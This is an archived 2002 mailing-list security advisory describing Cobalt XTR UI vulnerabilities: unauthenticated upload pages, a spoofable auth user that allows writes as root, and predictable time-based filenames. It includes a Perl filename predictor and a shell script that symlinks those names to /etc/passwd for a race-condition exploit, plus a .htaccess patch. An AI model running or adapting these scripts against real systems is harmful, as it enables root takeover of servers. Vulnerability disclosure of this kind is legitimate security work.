OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: W. ter Maat - Digit-Labs Information Security (termaatgelrevision.nl)
Date: Fri Mar 08 2002 - 12:32:38 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----------------------------------------------------------------
    Topic : Combined (Remote/Local root) Cobalt XTR vulnerabilities
    Date : 02-03-2002
    Author : Wouter ter Maat aka grazerdigit-labs.org
    Url : http://www.digit-labs.org
    -----------------------------------------------------------------

    Description : Some areas of the Cobalt XTR UI are not .htaccess protected,
                    Therefore users can access MultiFileUpload.php
                    from remote.
                    MultiFileUploadHandler.php handles upload request
                    posted from MultiFileUpload.php.
                    Due to an authentication bug in the upload Handler,
                    users can write files to the filesystem as any
                    valid user on the system, including root.

    Exploitation : To exploit this vulnerability, you need shell access
                    (or be creative).

                    ----- snippet of MultiFileUPload.php -----
                    // get uid
                    $pwnam = posix_getpwnam($PHP_AUTH_USER);
                    $uid = $pwnam["uid"];
                    // get filename
                    $baseName = base64_encode(time());
                    $fullName = "/tmp/" . $baseName;
                    ------------------------------------------

                    As you can see, user information is read to $pwnam, which
                    is the return value of function posix_getpwnam($PHP_AUTH_USER);
                    PHP_AUTH_USER can be modified to each desired value (remote)
                    (i prefer root :P).

                    The Next problem, lies in the base64 encoding of the filename,
                    which is predictable. If you can predict the base64 filenames
                    for example the next ten minutes (time()), and create symbolic
                    links to /etc/passwd, you will have exactly ten minutes to
                    exploit the machine.

                    After the symlinks have been created (script to create base64
                    symlink is below), you will need to upload your modified
                    target file (script set to /etc/passwd).
                    You can upload your file at
                    https://>:81/uifc/MultFileUploadHandler.php
                    (if you know how forms work, and understand the
    authentication error :P).

    Quick patch : Create a .htaccess file in the uifc directory.

    Vendor status : Sun Cobalt was notified at the day of writing.

    -> Explotation and further technical info can be found here:
        
    http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3665

    ---------------- local-timerace-xtr.pl -----------------
    #!/usr/bin/perl
    # mass base64 time encoder
    # part of Cobalt UIFC XTR remote/local combination attack

    use MIME::Base64;
    $evil_time = time();

    $exploit_secs = 10; # time in seconds you got to exploit this bug (race)

    for($i=1;$i<=$exploit_secs; $i++) {
          $evil_time = $evil_time+1;
          $evilstr = encode_base64($evil_time);
          print $evilstr;
    }
    -------------------------------------------------------

    ------------------- symlink-time.sh -------------------
    #!/bin/sh
    #Script for creating symlinks from output of local-timerace-xtr

    for foo in `perl -x xtr-timerace-xtr.pl`
    do
    ln -s /etc/passwd $foo
    done
    -------------------------------------------------------